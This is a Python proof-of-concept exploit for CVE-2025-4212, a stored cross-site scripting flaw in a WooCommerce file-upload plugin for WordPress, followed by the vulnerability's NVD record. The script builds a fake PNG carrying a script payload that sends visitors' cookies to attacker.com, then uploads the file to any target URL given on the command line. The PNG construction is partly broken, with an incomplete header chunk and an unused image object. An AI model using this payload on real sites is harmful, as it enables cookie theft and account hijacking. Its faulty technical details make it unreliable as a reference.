CVE-2025-4212

import requests import io from PIL import Image import argparse def create_xss_image(): """ Create a malicious image file with embedded XSS payload This PoC demonstrates the vulnerability in Checkout Files Upload for WooCommerce plugin """ # XSS payload embedded in image metadata xss_payload = '<script>document.location="https://attacker.com/steal?cookie="+document.cookie</script>' # Create a simple PNG image img = Image.new('RGB', (100, 100), color='red') # Method 1: Embed payload in PNG tEXt chunk img_bytes = io.BytesIO() # Create malicious PNG with embedded script # The plugin does not sanitize image metadata properly malicious_data = b'\x89PNG\r\n\x1a\n' # PNG signature malicious_data += b'\x00\x00\x00\rIHDR\x00\x00\x00\x64\x00\x00\x00\x64\x08\x02\x00\x00\x00' malicious_data += xss_payload.encode() return malicious_data def upload_exploit(target_url, image_data): """ Upload malicious image to vulnerable WordPress site """ files = { 'file': ('malicious_image.png', image_data, 'image/png') } try: response = requests.post(target_url, files=files, timeout=10) print(f'[+] Upload attempt completed. Status: {response.status_code}') return response except requests.exceptions.RequestException as e: print(f'[-] Upload failed: {e}') return None if __name__ == '__main__': parser = argparse.ArgumentParser(description='CVE-2025-4212 PoC') parser.add_argument('--url', required=True, help='Target upload endpoint URL') args = parser.parse_args() print('[+] Generating malicious image...') payload = create_xss_image() print(f'[+] Uploading to {args.url}') upload_exploit(args.url, payload)

{"cve": {"id": "CVE-2025-4212", "sourceIdentifier": "[email protected]", "published": "2025-11-18T10:15:50.073", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Checkout Files Upload for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file uploads in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in image files that will execute whenever a user accesses the injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?old_path=/checkout-files-upload-woocommerce/tags/2.2.1&new_path=/checkout-files-upload-woocommerce/tags/2.2.2", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/09d9785a-db71-4735-b86b-7fa10cf36a0b?source=cve", "source": "[email protected]"}]}}